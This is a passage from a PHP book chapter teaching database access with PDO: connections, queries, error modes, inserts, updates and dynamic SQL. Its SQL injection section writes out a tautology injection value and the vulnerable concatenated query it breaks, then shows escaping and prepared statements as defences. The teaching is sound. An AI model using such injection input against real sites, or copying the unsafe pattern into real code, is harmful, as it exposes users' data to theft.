  • 63. Chapter 2: Using Databases with PDO In the “old days” of the Internet, most web pages were nothing more than text files containing HTML. When people visited your site, your web server simply made the file available to their browsers. This approach started out fine, but as web sites grew, and issues such as design and navigation became more important, developers found that maintaining consistency across hundreds of HTML files was becoming a massive headache. To solve this problem, it became popular to separate variable content (articles, news items, and so on) from the static elements of the site: its design and layout. If a database is used as a repository to store variable content, a server-side language such as PHP performs the task of fetching that data and placing it within a uniform layout template. This means that modifying the look and feel of a site can be handled as a separate task from the maintenance of content. And maintaining consistency across all the pages in a web site no longer consumes a developer’s every waking hour. PHP supports all the relational databases worth mentioning, including those that are commonly used in large companies: Oracle, IBM’s DB2, and Microsoft’s SQL Server, to name a few. The three most noteworthy open source alternatives are
  • 64. 40 The PHP Anthology SQLite, PostgreSQL, and MySQL. PostgreSQL is arguably the best database of the three, in that it supports more of the features that are common to relational databases. SQLite is the perfect choice for smaller applications that still require database capability. MySQL is a popular choice among web hosts that provide support for PHP, and for this reason is typically easier to find than PostgreSQL. This chapter covers all the common operations that PHP developers perform when working with databases: retrieving and modifying data, and searching and backing up the database. To achieve these tasks, we’ll use the built-in PDO extension, rather than database-specific extensions. The examples we’ll work with will use a single table, so no discussion is made of table relationships here. For a full discussion of that topic, see Kevin Yank’s Build Your Own Database Driven Website Using PHP & MySQL, 3rd Edition (SitePoint, Melbourne, 2006).1 The examples included here work with the MySQL sample database called “world,” though all the interactions we’ll work through can be undertaken with any database supported by PDO. The SQL file for the world database is available at http://dev.mysql.com/doc/#sampledb and the instructions explaining its use can be found at http://dev.mysql.com/doc/world-setup/en/world-setup.html. What is PDO? PDO, the PHP Data Objects extension, is a data-access abstraction layer. But what the heck is that? Basically, it’s a consistent interface for multiple databases. No longer will you have to use the mysql_* functions, the sqlite_* functions, or the pg_* functions, or write wrappers for them to work with your database. Instead, you can simply use the PDO interface to work with all three databases using the same methods. 
And, if you change databases, you’ll only have to change the DSN (or Data Source Name) of the PDO to make your code work.2 PDO uses specific database drivers to interact with various databases, so you can’t use PDO by itself. You’ll need to enable the drivers you’ll use with PDO, so be sure 1 http://www.sitepoint.com/books/phpmysql1/ 2 That’s all you’ll have to do so long as you write your SQL in a way that’s not database specific. If you try to stick to the ANSI 92 standard [http://www.contrib.andrew.cmu.edu/~shadow/sql/sql1992.txt], you should generally be okay, as most databases support that syntax.
  • 65. Using Databases with PDO 41 to research how to do it for your specific host operating system on the PDO manual page.3 PDO is shipped with PHP 5.1 and is available from PECL for PHP 5.0. Unfortunately, as PDO requires the new PHP 5 object oriented features, it’s not available for PHP 4. In this book, all of our interactions with the database will use PDO to interact with the MySQL back end. How do I access a database? Before we can do anything with a database, we need to talk to it. And to talk to it, we must make a database connection. Logical, isn’t it? Solution Here’s how we connect to a MySQL database on the localhost: mysqlConnect.php (excerpt) <?php $dsn = 'mysql:host=localhost;dbname=world;'; $user = 'user'; $password = 'secret'; try { $dbh = new PDO($dsn, $user, $password); } catch (PDOException $e) { echo 'Connection failed: ' . $e->getMessage(); } ?> We’d use this code to connect to a SQLite database on the localhost: 3 http://www.php.net/pdo/
  • 66. 42 The PHP Anthology sqliteConnect.php (excerpt) <?php $dsn = 'sqlite2:"C:\sqlite\world.db"'; try { $dbh = new PDO($dsn); } catch (PDOException $e) { echo 'Connection failed: ' . $e->getMessage(); } ?> And this code will let us connect to a PostgreSQL database on the localhost: postgreConnect.php (excerpt) <?php $dsn = 'pgsql:host=localhost port=5432 dbname=world user=user '; $dsn .= 'password=secret'; try { $dbh = new PDO($dsn); } catch (PDOException $e) { echo 'Connection failed: ' . $e->getMessage(); } ?> Discussion Notice that in all three examples above, we simply create a new PDO object. Only the connection data for the PDO constructor differs in each case: for the SQLite and PostgreSQL connections, we need just the DSN; the MySQL connection also requires username and password arguments in order to connect to the database.4 4 We could have put the username and password information in the MySQL DSN, providing a full DSN, but the average user has no cause to do this when using MySQL. It just adds unnecessary complexity to the DSN.
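To make the point concrete, here is a minimal sketch of a connection helper in which only the DSN (and, where needed, the credentials) varies. The function name connect is hypothetical, and the example assumes the pdo_sqlite driver is enabled; it uses SQLite's in-memory database (sqlite::memory:) so that it can run without a database server.

```php
<?php
// Hypothetical helper: opens a PDO connection for any DSN and
// switches on exception mode so that failures are not silent.
function connect($dsn, $user = null, $password = null)
{
    $dbh = new PDO($dsn, $user, $password);
    $dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    return $dbh;
}

try {
    // An in-memory SQLite database needs no user name or password.
    $dbh = connect('sqlite::memory:');
    // For MySQL, only the arguments would change, for example:
    // $dbh = connect('mysql:host=localhost;dbname=world', 'user', 'secret');
    $driver = $dbh->getAttribute(PDO::ATTR_DRIVER_NAME);
    echo 'Connected using the ', $driver, " driver\n";
} catch (PDOException $e) {
    echo 'Connection failed: ' . $e->getMessage();
}
```

Whichever driver sits behind the DSN, the rest of the script only ever sees a PDO object.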
  • 67. Using Databases with PDO 43 The DSN in Detail As we saw above, DSN is an acronym for Data Source Name. The DSN provides the information we need in order to connect to a database. The DSN for PDO has three basic parts: the PDO driver name (such as mysql, sqlite, or pgsql), a colon, and the driver-specific syntax. The only aspect that may be a bit confusing here is the driver-specific syntax, as each driver requires different information. But have no fear: the trusty manual is here, of course! The manual describes the database driver-specific syntax that’s required in the DSN for each of the PDO drivers. All you need to do is to go to the database driver page,5 select your database driver, and follow the link to the DSN information. For example, the MySQL DSN page in the manual is found at http://www.php.net/manual/en/ref.pdo-mysql.connection.php; it’s shown in Figure 2.1. Figure 2.1. The PDO_MySQL DSN manual page 5 http://www.php.net/manual/en/ref.pdo.php#pdo.drivers
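The three-part structure of a DSN can be sketched in a few lines of code. The buildDsn function below is a hypothetical helper written for this illustration, not part of PDO; it assumes the driver-specific part is a list of key=value pairs, which holds for the MySQL and PostgreSQL drivers but not for every driver (SQLite, for instance, takes a file path).

```php
<?php
// Hypothetical helper: joins the three parts of a DSN, which are the
// driver name, a colon, and the driver-specific key=value pairs.
function buildDsn($driver, array $params, $separator = ';')
{
    $pairs = array();
    foreach ($params as $key => $value) {
        $pairs[] = $key . '=' . $value;
    }
    return $driver . ':' . implode($separator, $pairs);
}

$mysqlDsn = buildDsn('mysql', array(
    'host'   => 'localhost',
    'port'   => 3306,
    'dbname' => 'world',
));
echo $mysqlDsn, "\n"; // mysql:host=localhost;port=3306;dbname=world

// The PostgreSQL examples in this chapter separate pairs with spaces.
$pgsqlDsn = buildDsn('pgsql', array(
    'host'   => 'localhost',
    'port'   => 5432,
    'dbname' => 'world',
), ' ');
echo $pgsqlDsn, "\n"; // pgsql:host=localhost port=5432 dbname=world
```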
  • 68. 44 The PHP Anthology DSN examples are also provided on each manual page to get you started. Do Not Pass Credentials in the DSN In the database connection examples we just saw, I included my access credentials within the DSN, or in the $user and $password variables, but I did so for illustration purposes only. This is not standard (or appropriate) practice, since this information can be misused by malicious parties to access your database. Other Concepts There are several concepts that you should understand when working with a database. First, you need to remember that the database server is a completely separate entity from PHP. While in these examples the database server and the web server are the same machine, this is not always the case. So, if your database is on a different machine from your PHP, you’ll need to change the host name in the DSN to point to it. To make things more interesting, database servers only listen for your connection on a specific port number. Each database server has a default port number (MySQL’s is 3306, PostgreSQL’s is 5432), but that may not be the port that the database administrator chose to set, or the one that PHP knows to look at. When in doubt, include your port number in the DSN. You also need to be aware that a database server can have more than one database on it, so yours may not be the only one. This is why the database name is commonly included in the DSN: to help you get to your data, not some other person’s! Finally, make sure you understand what you’ll receive from your PDO connection. Your connection will return a PDO object, not a reference to the database, or any data. It is through the PDO object that we interact with the database, bending it to our will. How do I fetch data from a table? Here we are, connected to the database. Woo hoo! But what good is that if we can’t get anything out of the database?
  • 69. Using Databases with PDO 45 Solutions PDO provides a couple of ways for us to interact with the database. Here, we’ll explore both possible solutions. Using the Query Method First, let’s look at the faster, but not necessarily better, way of using the query method: pdoQuery.php (excerpt) $country = 'USA'; try { $dbh = new PDO($dsn, $user, $password); $dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); $sql = 'Select * from city where CountryCode =' . $dbh->quote($country); foreach ($dbh->query($sql) as $row) { print $row['Name'] . "\t"; print $row['CountryCode'] . "\t"; print $row['Population'] . "\n"; } } catch (PDOException $e) { echo 'PDO Exception Caught. '; echo 'Error with the database: <br />'; echo 'SQL Query: ', $sql; echo 'Error: ' . $e->getMessage(); } An excerpt of this code’s output can be seen in Figure 2.2.
  • 70. 46 The PHP Anthology Figure 2.2. Output produced using the PDO query method Using the Prepare and Execute Methods Using the prepare and execute methods is generally considered the better way to handle a query to the database. First, we call PDO->prepare with our SQL statement as an argument. In return, we receive a PDOStatement object, on which we call the execute method. Then, within a while loop, we repeatedly call the PDOStatement->fetch method to retrieve the data we’ve selected from our database: pdoPrepEx.php (excerpt) $country = 'USA'; try { $dbh = new PDO($dsn, $user, $password); $sql = 'Select * from city where CountryCode =:country'; $dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); $stmt = $dbh->prepare($sql); $stmt->bindParam(':country', $country, PDO::PARAM_STR);
  • 71. Using Databases with PDO 47 $stmt->execute(); while ($row = $stmt->fetch(PDO::FETCH_ASSOC)) { print $row['Name'] . "\t"; print $row['CountryCode'] . "\t"; print $row['Population'] . "\n"; } } catch (PDOException $e) { echo 'PDO Exception Caught. '; echo 'Error with the database: <br />'; echo 'SQL Query: ', $sql; echo 'Error: ' . $e->getMessage(); } An excerpt of the output of this code can be seen in Figure 2.3. Figure 2.3. Output using the PDO prepare and execute methods
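For readers without the world database to hand, the following self-contained sketch runs the same prepare, execute, and fetch sequence against an in-memory SQLite database (this assumes the pdo_sqlite driver is enabled). The table is a cut-down stand-in for the real city table, and the population figures are placeholder values rather than real data. The sketch also shows the positional question mark (?) marker, which PDO accepts as an alternative to named parameters.

```php
<?php
$dbh = new PDO('sqlite::memory:');
$dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

// Stand-in for the world database's city table (placeholder figures).
$dbh->exec('CREATE TABLE city (Name TEXT, CountryCode TEXT, Population INTEGER)');
$dbh->exec("INSERT INTO city VALUES ('New York', 'USA', 100)");
$dbh->exec("INSERT INTO city VALUES ('Toronto', 'CAN', 200)");

// Named placeholder, bound with bindParam as in the excerpt above.
$country = 'USA';
$stmt = $dbh->prepare('SELECT * FROM city WHERE CountryCode = :country');
$stmt->bindParam(':country', $country, PDO::PARAM_STR);
$stmt->execute();
$named = $stmt->fetchAll(PDO::FETCH_ASSOC);

// Positional placeholder, with the value passed straight to execute.
$stmt = $dbh->prepare('SELECT * FROM city WHERE CountryCode = ?');
$stmt->execute(array('CAN'));
$positional = $stmt->fetchAll(PDO::FETCH_ASSOC);

foreach (array_merge($named, $positional) as $row) {
    print $row['Name'] . "\t" . $row['CountryCode'] . "\t" . $row['Population'] . "\n";
}
```

Here fetchAll collects the whole result set at once, which is convenient for small results; the while loop over fetch shown earlier is the better fit when a result set is large.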
  • 72. 48 The PHP Anthology Discussion You’ll have noticed that both these solutions give you the same data, which is as it should be. But there are very specific reasons for choosing one solution over the other. PDO->query is great when you’re only executing a query once. While it doesn’t automatically escape any data you send it, it does have the very handy ability to iterate over the result set of a successful SELECT statement. However, you should take care when using this method. If you don’t fetch all the data in the result set, your next call to PDO->query might fail.6 If you’re going to use the SQL statement more than once, your best bet is to use prepare and execute, the preferred solution. Using prepare and execute has a couple of advantages over query. First, it will help to prevent SQL injection attacks by automatically escaping any argument you give it (this approach is often considered the better practice for this reason alone). Granted, if you build any other part of your query from user input, that will negate this advantage, but you wouldn’t ever do that, would you? Second, prepared statements that are used multiple times (for example, to perform multiple inserts or updates to a database) use fewer resources and will run faster than repeated calls to the query method. There are a couple of other ways we can use prepare and execute on a query, but I feel that the example we discussed here will be the clearest. I used named parameters in this solution, but be aware that PDO also supports question mark (?) parameter markers. In the example we saw here, you could have chosen not to use the bindParam method; instead, you could have given the parameters to the execute method. See The PHP Manual if you have any questions about the alternative syntaxes. Using Fetch Choices When you use prepare and execute, you have the choice of a number of formats in which data can be returned. 
The example we saw used the PDO::FETCH_ASSOC 6 For further information, see The PHP Manual page at http://www.php.net/manual/en/function.PDO-query.php.
  • 73. Using Databases with PDO 49 option with the fetch method, because it returns data in a format that will be very familiar to PHP 4 users: an associative array.7 If you’d rather use only object-oriented code in your application, you could instead employ the fetchObject method, which, as the name implies, returns the result set as an object. Here’s how the while loop will look when the fetchObject method is used: pdoPrepEx2.php (excerpt) while ($row = $stmt->fetchObject()) { print $row->Name . "\t"; print $row->CountryCode . "\t"; print $row->Population . "\n"; } How do I resolve errors in my SQL queries? Errors are inevitable. They assail all of us and can, at times, be caused by circumstances outside our control: database crashes, database upgrades, downtime for maintenance, and so on. If something goes wrong when you’re trying to deal with PHP and SQL together, it’s often difficult to find the cause. The trick is to get PHP to tell you where the problem is, bearing in mind that you must be able to hide this information from visitors when the site goes live. We’re Only Looking for Errors, Not Fixing Them! I won’t be explaining error handling in depth here; instead, I’ll show you how to find errors. See Chapter 9 for more information on what to do when you’ve found an error and want to fix it. Solutions PDO provides multiple solutions for catching errors. We’ll go over all three options in the following examples, where we’ll introduce a typo into the world database 7 For a full listing of the ways in which you can have data returned, see the fetch page of the manual at http://www.php.net/manual/en/function.pdostatement-fetch.php.
  • 74. 50 The PHP Anthology table name, so that it reads cities instead of city. If you run this code yourself, you can also try commenting out the error-handling code to see what may be displayed to site visitors. Using Silent Mode PDO::ERRMODE_SILENT is the default mode: pdoError1.php (excerpt) $country = 'USA'; $dbh = new PDO($dsn, $user, $password); $sql = 'Select * from cities where CountryCode =:country'; $stmt = $dbh->prepare($sql); $stmt->bindParam(':country', $country, PDO::PARAM_STR); $stmt->execute(); $code = $stmt->errorCode(); if ($code === '00000') { ⋮ proceed to fetch data } else { echo 'Error with the database: <br />'; echo 'SQL Query: ', $sql; echo '<pre>'; var_dump($stmt->errorInfo()); echo '</pre>'; } The default error mode sets the error code of the PDOStatement object, but does nothing else. As you can see in this example, you need to check the error code manually to ascertain whether or not an error was found (errorCode returns a five-character SQLSTATE string, and '00000' means success); otherwise your script will happily continue on its merry way. Using Warning Mode PDO::ERRMODE_WARNING generates a PHP warning as well as setting the error code:
  • 75. Using Databases with PDO 51 pdoError2.php (excerpt) $country = 'USA'; $dbh = new PDO($dsn, $user, $password); $dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_WARNING); $sql = 'Select * from cities where CountryCode =:country'; $stmt = $dbh->prepare($sql); $stmt->bindParam(':country', $country, PDO::PARAM_STR); $stmt->execute(); $code = $stmt->errorCode(); if ($code === '00000') { ⋮ proceed to fetch data } else { echo 'Error with the database: <br />'; echo 'SQL Query: ', $sql; echo '<pre>'; var_dump($stmt->errorInfo()); echo '</pre>'; } Again, the program will continue on its merry way unless you specifically check for the error code ('00000' means success). So, unless you have the Display Errors functionality turned on, use a custom error handler, or check your error logs, you may not notice the warning. Using Exception Mode PDO::ERRMODE_EXCEPTION creates a PDOException as well as setting the error code: pdoError3.php (excerpt) $country = 'USA'; try { $dbh = new PDO($dsn, $user, $password); $dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); $sql = 'Select * from cities where CountryCode =:country'; $stmt = $dbh->prepare($sql); $stmt->bindParam(':country', $country, PDO::PARAM_STR); $stmt->execute();
  • 76. 52 The PHP Anthology ⋮ proceed to fetch data } catch (PDOException $e) { echo 'PDO Exception Caught. '; echo 'Error with the database: <br />'; echo 'SQL Query: ', $sql; echo '<pre>'; echo 'Error: ' . $e->getMessage() . '<br />'; echo 'Code: ' . $e->getCode() . '<br />'; echo 'File: ' . $e->getFile() . '<br />'; echo 'Line: ' . $e->getLine() . '<br />'; echo 'Trace: ' . $e->getTraceAsString(); echo '</pre>'; } PDO::ERRMODE_EXCEPTION allows you to wrap your code in a try {…} catch {…} block. An uncaught exception will halt the script and display a stack trace to let you know there’s a problem. PDOException extends RuntimeException, one of the exception classes in the Standard PHP Library (or SPL), which in turn extends the general PHP Exception class.8 Discussion Most people will choose to take advantage of PHP’s more powerful object oriented model, and use the Exception mode to handle errors, since it follows the object oriented style of error handling (catching and handling different types of exceptions) and is easier to work with. Regardless of the way you choose to handle your errors, it’s a good idea to return the text of the SQL query itself. This allows you to see exactly which query is problematic and will assist you in debugging the error. 8 You can learn more about the SPL and PHP’s base Exception class in the manual, at http://www.php.net/spl/ and http://www.php.net/manual/en/language.exceptions.php.
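On a live site you will usually want the detail to go to a log rather than to the browser. The following is a minimal sketch of that idea using exception mode and PHP's error_log function; it assumes the pdo_sqlite driver is enabled and uses an in-memory SQLite database, and the wording of the visitor-facing message is an arbitrary choice made for the example.

```php
<?php
$dbh = new PDO('sqlite::memory:');
$dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$dbh->exec('CREATE TABLE city (Name TEXT, CountryCode TEXT)');

// Deliberate typo, as in the examples above: cities instead of city.
$sql = 'SELECT * FROM cities WHERE CountryCode = :country';
$caught = false;
try {
    $stmt = $dbh->prepare($sql);
    $stmt->execute(array(':country' => 'USA'));
} catch (PDOException $e) {
    $caught = true;
    // Keep the detail (message plus offending SQL) in the error log...
    error_log('Database error: ' . $e->getMessage() . ' | SQL: ' . $sql);
    // ...and show visitors only a generic message.
    echo 'Sorry, something went wrong. Please try again later.';
}
```

The SQL text still travels with the error, as recommended above, but it lands in the log where only you can read it.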
  • 77. Using Databases with PDO 53 How do I add data to, or modify data in, my database? Being able to fetch data from the database is a start, but how can you put it there in the first place? Solution We add data to the database with the SQL INSERT command, and modify data that’s already in the database with the SQL UPDATE command. Both commands can be sent to the database using either the query method or the prepare and execute methods. I’ll be using the prepare and execute methods in this solution. INSERT Data into the Database First up, let’s look at a simple INSERT, using the City table from the world database: insert.php (excerpt) $id = '4080'; $name = 'Guam'; $country = 'GU'; $district = 'Guam'; $population = 171018; try { $dbh = new PDO($dsn, $user, $password); $dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); $sql = 'INSERT INTO city (ID, Name, CountryCode, District, Population) VALUES (:id, :name, :country, :district, :pop)'; $stmt = $dbh->prepare($sql); $stmt->bindParam(':id', $id); $stmt->bindParam(':name', $name); $stmt->bindParam(':country', $country); $stmt->bindParam(':district', $district); $stmt->bindParam(':pop', $population); $stmt->execute(); } catch (PDOException $e) { echo 'PDO Exception Caught. ';
  • 78. 54 The PHP Anthology echo 'Error with the database: <br />'; echo 'SQL Query: ', $sql; echo 'Error: ' . $e->getMessage(); } ?> UPDATE Data in the Database And here’s a simple UPDATE, using the City table from the world database: update.php (excerpt) $id = '4080'; $name = 'Guam'; $country = 'GU'; $district = 'Guam'; $population = 171019; // data provided by the U.S. Census // Bureau, International Data Base // Mid year 2006 try { $dbh = new PDO($dsn, $user, $password); $dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); $sql = 'UPDATE city SET Name = :name, CountryCode = :country, District = :district, Population = :pop WHERE ID = :id'; $stmt = $dbh->prepare($sql); $stmt->bindParam(':id', $id); $stmt->bindParam(':name', $name); $stmt->bindParam(':country', $country); $stmt->bindParam(':district', $district); $stmt->bindParam(':pop', $population); $stmt->execute(); } catch (PDOException $e) { echo 'PDO Exception Caught. '; echo 'Error with the database: <br />'; echo 'SQL Query: ', $sql; echo 'Error: ' . $e->getMessage(); } ?>
  • 79. Using Databases with PDO 55 Discussion Note that other than changing the SQL statement used in the prepare method, the code in both examples above is exactly the same. We do like to keep things easy in PHP! In a practical application, some, if not all of the inputs to the query will be garnered from user-generated content. Because we’re using the prepare and execute methods, we don’t have to worry about an SQL injection attack on this query: all the variables will be escaped automatically. Be Cautious with UPDATE and DELETE Be very careful when you use UPDATE or DELETE in your SQL. If you don’t have a WHERE clause in your SQL statement, you will end up updating or deleting all the rows in the table. Needless to say, either outcome could cause serious problems! How do I protect my web site from an SQL injection attack? An SQL injection attack occurs when an attacker exploits a legitimate user input mechanism on your site to send SQL code that your unsuspecting script passes on to the database for execution. The golden rule for avoiding SQL injection attacks is: escape all data from external sources before letting it near your database. That rule doesn’t just apply to INSERT and UPDATE queries, but also to SELECT queries. As we discussed earlier, using prepared statements for all your queries within a script almost eliminates the problem of SQL injection attacks, but if you choose to use the query method, you’ll have no such protection: you’ll have to manually escape any user input that goes into the query. Let’s look at an example: sqlInject.php (excerpt) //$city = 'New York'; $city = "' or Name LIKE '%"; try { $dbh = new PDO($dsn, $user, $password); $dbh->setAttribute(PDO::ATTR_ERRMODE,
  • 80. 56 The PHP Anthology PDO::ERRMODE_EXCEPTION); $sql = "Select * from city where Name ='". $city ."'"; foreach ($dbh->query($sql) as $row) { print $row['Name'] . "\t"; print $row['CountryCode'] . "\t"; print $row['Population'] . "\n"; } } catch (PDOException $e) { echo 'PDO Exception Caught. '; echo 'Error with the database: <br />'; echo 'SQL Query: ', $sql; echo 'Error: ' . $e->getMessage(); } In this example, we’ll pretend that the $city variable used in the SQL statement comes from a form submitted by the user. A typical user would submit something like New York. This would give us the following SQL statement: Select * from city where Name ='New York' This would cause no problems within the script. A savvy attacker, however, may enter ' OR Name LIKE '%, which would give us the following SQL statement: Select * from city where Name ='' OR Name LIKE '%' This input opens the entire table to the attacker. “No big deal,” you say. “It’s only a list of cities.” Yes, but what if instead of our simple city table, this was the authorized users table? The attacker would have access to extremely sensitive data! Solution Luckily, this issue is fairly easy to avoid, though the solution will mean more work for you. You can use PDO’s handy quote method to escape any data that you’re passing to the SQL string. The quote method adds the surrounding quotation marks itself, so simply change the SQL code to this: $sql = 'Select * from city where Name =' . $dbh->quote($city);
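The difference is easy to see in a self-contained sketch. The example below assumes the pdo_sqlite driver is enabled and uses an in-memory SQLite database with a two-row stand-in for the city table; it runs the attacker's input once pasted directly into the SQL and once passed through quote, which supplies the surrounding quotation marks itself.

```php
<?php
$dbh = new PDO('sqlite::memory:');
$dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$dbh->exec('CREATE TABLE city (Name TEXT)');
$dbh->exec("INSERT INTO city VALUES ('New York')");
$dbh->exec("INSERT INTO city VALUES ('Toronto')");

$city = "' OR Name LIKE '%"; // the attacker's input

// Unsafe: the input is pasted into the SQL and rewrites the query.
$unsafeSql = "SELECT * FROM city WHERE Name = '" . $city . "'";
$unsafeRows = $dbh->query($unsafeSql)->fetchAll(PDO::FETCH_ASSOC);

// Safe: quote() escapes the input and adds the surrounding quotes.
$safeSql = 'SELECT * FROM city WHERE Name = ' . $dbh->quote($city);
$safeRows = $dbh->query($safeSql)->fetchAll(PDO::FETCH_ASSOC);

echo 'Unsafe query matched ', count($unsafeRows), " rows\n"; // 2
echo 'Quoted query matched ', count($safeRows), " rows\n";   // 0
```

The unsafe query returns every row in the table, while the quoted query simply looks for a city whose name is the attacker's odd string, and finds none.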
  • 81. Using Databases with PDO 57 Remember that you’ll need to quote each individual piece of data you use in the SQL query; there aren’t any shortcuts! That is, unless you consider prepare and execute a shortcut. Discussion If you’re using the PDO->query method, always quote your input. Always! If you choose to use the prepare and execute approach, you won’t have to quote the values that you bind to the prepared SQL (for example, the values to be inserted); that’s all done for you by the driver. However, there may be times when you won’t be able to bind a variable to the prepared SQL (for example, in a GROUP BY or ORDER BY clause, or for the table name). The quote method won’t help in such cases, because it produces a string value rather than a column or table name, so if you’re building a dynamic SQL statement, check any such input against a fixed list of permitted values before it goes into the SQL. Remember: a strong defense is a good offense. How do I create flexible SQL statements? SQL is a powerful language for manipulating data. With PHP, we can construct SQL statements out of variables, an approach that can be useful for sorting a table by a single column, or displaying a large result set across multiple pages. Solution Until the SQL is prepared and executed, it’s still just a string that you can manipulate as you’d expect. This solution uses concatenation based on user input to select cities from the specified country and display them in a specified order: flexSQLConcat.php (excerpt) $validCountries = array ('USA', 'CAN', 'GU', 'ISR'); if (isset($_GET['country']) && in_array($_GET['country'], $validCountries)) { $country = $_GET['country']; } else { $country = 'USA'; }
  • 82. 58 The PHP Anthology $order = (!isset($_GET['order'])) ? FALSE : $_GET['order']; try { $dbh = new PDO($dsn, $user, $password); $dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); $sql = 'SELECT * FROM city WHERE CountryCode = :country'; switch ($order) { case 'district': // Add to the $sql string $sql .= " ORDER BY District"; break; case 'pop': $sql .= " ORDER BY Population DESC"; break; default: // Default sort by name $sql .= " ORDER BY Name"; break; } $stmt = $dbh->prepare($sql); $stmt->bindParam(':country', $country); $stmt->execute(); while ($row = $stmt->fetch(PDO::FETCH_ASSOC)) { print $row['Name'] . "\t"; print $row['CountryCode'] . "\t"; print $row['Population'] . "\n"; } } catch (Exception $e) { echo 'PDO Exception Caught. '; echo 'Error with the database: <br />'; echo 'SQL Query: ', $sql; echo 'Error: ' . $e->getMessage(); } In this code, the user input is read either from a web form that has GET as its method, or a URL with a query string. In the switch statement above, we’re generating dynamic SQL using concatenation. The $order value is read, and an ORDER BY clause is added to the SQL query.
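The same idea can be written more compactly as a lookup table. The sketch below is one possible variant, with a hypothetical helper named orderByClause; as in the switch statement, the user's input only ever selects one of a fixed set of clauses and is never copied into the SQL itself.

```php
<?php
// Hypothetical helper: maps the user's choice onto a fixed list of
// ORDER BY clauses, so raw input never reaches the SQL string.
function orderByClause($order)
{
    $allowed = array(
        'district' => 'District',
        'pop'      => 'Population DESC',
    );
    // Anything not in the list falls back to sorting by name.
    if (is_string($order) && isset($allowed[$order])) {
        return ' ORDER BY ' . $allowed[$order];
    }
    return ' ORDER BY Name';
}

$order = isset($_GET['order']) ? $_GET['order'] : false;
$sql = 'SELECT * FROM city WHERE CountryCode = :country' . orderByClause($order);
echo $sql, "\n";
```

Adding a new sort option then means adding one entry to the array, rather than another case to the switch.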
  • 83. Using Databases with PDO 59 Discussion An alternative solution involves using sprintf to build your dynamic SQL. This approach is similar to binding variables to the prepared SQL: flexSQLSprintf.php (excerpt) switch ($order) { case 'district': $orderby = " District"; break; case 'pop': $orderby = " Population DESC"; break; default: $orderby = " Name"; break; } $format = 'SELECT * FROM city WHERE CountryCode = :country ORDER BY %s'; $sql = sprintf($format, $orderby); It’s a matter of personal style, but either of these approaches can be extended to columns, table names, WHERE clauses, LIMIT clauses, and anything else you wish to include in your SQL query. Remember that until the point at which the SQL is prepared and executed, it’s just a string that you can manipulate as much as you require. How do I find out how many rows I’ve touched? Often, it’s useful to be able to count the number of rows returned or affected by a query before you do anything with them. This capability is particularly handy when you’re splitting results across pages, or producing statistical information. Solutions The two solutions that follow will enable you to count the number of rows returned, and the number of rows affected, by your operations within the database.
  • 84. 60 The PHP Anthology Counting the Rows Returned PDO doesn’t have a magic method that counts the number of rows returned from a SELECT call. You can use the PDOStatement->rowCount method to return the number of rows returned by a SELECT statement with some PDO database drivers. However, as the behavior of this function isn’t guaranteed to be consistent with every database driver, I won’t cover it here. Feel free to try it yourself with your database driver, but keep in mind that if you need to write portable code, this approach is not reliable. There is, however, a solution that works around this lack of a useful method: it uses the SQL aggregate function COUNT. Here’s the code that will count the number of rows returned: count.php (excerpt) $country = 'USA'; try { $dbh = new PDO($dsn, $user, $password); $dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); $sql = 'SELECT COUNT(*) FROM city WHERE CountryCode =:country'; $stmt = $dbh->prepare($sql); $stmt->bindParam(':country', $country, PDO::PARAM_STR); $result = $stmt->execute(); echo 'There are ', $stmt->fetchColumn(), ' rows returned.'; } catch (PDOException $e) { echo 'PDO Exception Caught. '; echo 'Error with the database: <br />'; echo 'SQL Query: ', $sql; echo 'Error: ' . $e->getMessage(); } Discussion COUNT returns the number of rows from a query, or a part of a query, and is commonly used with the DISTINCT keyword. SQL’s aggregate function COUNT is widely supported by the various database systems. For more information on how your database handles COUNT, see your database’s documentation.
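To show COUNT working alongside DISTINCT, here is a minimal self-contained sketch. It assumes the pdo_sqlite driver is enabled and uses an in-memory SQLite database; the table is a stand-in for the city table and its four rows are invented for the example.

```php
<?php
$dbh = new PDO('sqlite::memory:');
$dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

// Invented sample rows: three cities in USA, one in CAN.
$dbh->exec('CREATE TABLE city (Name TEXT, CountryCode TEXT, District TEXT)');
$dbh->exec("INSERT INTO city VALUES ('Alpha', 'USA', 'North')");
$dbh->exec("INSERT INTO city VALUES ('Beta', 'USA', 'North')");
$dbh->exec("INSERT INTO city VALUES ('Gamma', 'USA', 'South')");
$dbh->exec("INSERT INTO city VALUES ('Delta', 'CAN', 'East')");

// COUNT(*) counts matching rows; COUNT(DISTINCT ...) counts the
// different values that appear in one column of those rows.
$stmt = $dbh->prepare(
    'SELECT COUNT(*), COUNT(DISTINCT District) FROM city WHERE CountryCode = :country'
);
$stmt->execute(array(':country' => 'USA'));
$row = $stmt->fetch(PDO::FETCH_NUM);
$cities = (int) $row[0];
$districts = (int) $row[1];

echo $cities, ' cities in ', $districts, " distinct districts\n";
```

With the sample rows above, this prints "3 cities in 2 distinct districts".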
